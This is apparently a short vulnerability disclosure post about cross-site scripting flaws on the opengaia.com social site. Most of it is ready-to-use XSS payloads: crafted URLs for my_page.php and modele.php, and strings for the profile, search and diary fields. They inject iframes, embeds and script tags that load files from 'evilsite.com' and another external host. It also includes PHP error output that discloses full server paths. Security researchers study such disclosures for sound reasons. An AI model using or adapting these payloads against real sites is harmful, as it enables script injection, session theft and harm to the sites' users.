Opengaia.com - XSS Vuln & Session Include
Opengaia.com
Homepage:
http://www.opengaia.com
Effected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog
------------------------------------
Just like in onlinenode.com's vulnerabilities, it seems this site filters data
just about the same. Below is one way to create a XSS vuln by closing quotes
and using an open ended iframe.
http://www.opengaia.com/my_page.php?viewed_id=6871">'>'><iframe%20src=http://evilsite.com/scriptlet.html%20<<BR><BR>&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274
<embed> tags also workin each .php file. Example:
http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">
Module.php XSS Vuln:
It seems with this code, we'll get a php error with full path disclosure and
the xss won't work:
http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C
Warning: main(./): failed to open stream: Success in
/home/user/public_html/modele.php on line 243
Warning: main(./): failed to open stream: Permission denied in
/home/user/public_html/modele.php on line 243
Warning: main(): Failed opening './' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/encoree/public_html/modele.php on line 243
Warning: main(./): failed to open stream: Permission denied in
/home/user/public_html/modele.php on line 247
Warning: main(./): failed to open stream: Permission denied in
/home/user/public_html/modele.php on line 247
Warning: main(): Failed opening './' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/
public_html/modele.php on line 247
modele.php XSS Vuln using iframe tag:
http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre=
-------------------------------------
Editing your profile XSS with PHP Session included:
It seems the input boxes of editing your profile don't properlly filter user
input before generating it. For a PoC example
we will use end tags and put <script> tags to bypass this filter:
'>"><""><SCRIPT SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"">
Screenshots of PoC in action:
http://www.youfucktard.com/xsp/gaia2.jpg
http://www.youfucktard.com/xsp/gaia3.jpg
http://www.youfucktard.com/xsp/gaia3.jpg
-----------------------------------
Search input box XSS Vuln PoC:
in the search boxtry putting:
<iframe src=http://www.evilsite.com/scriptlet.html <
---------------------------------
Data isn't properly filtered when adding a diary/blog as well. for PoC try
putting:
<iframe src=http://evilsite.com/scriptlet.html <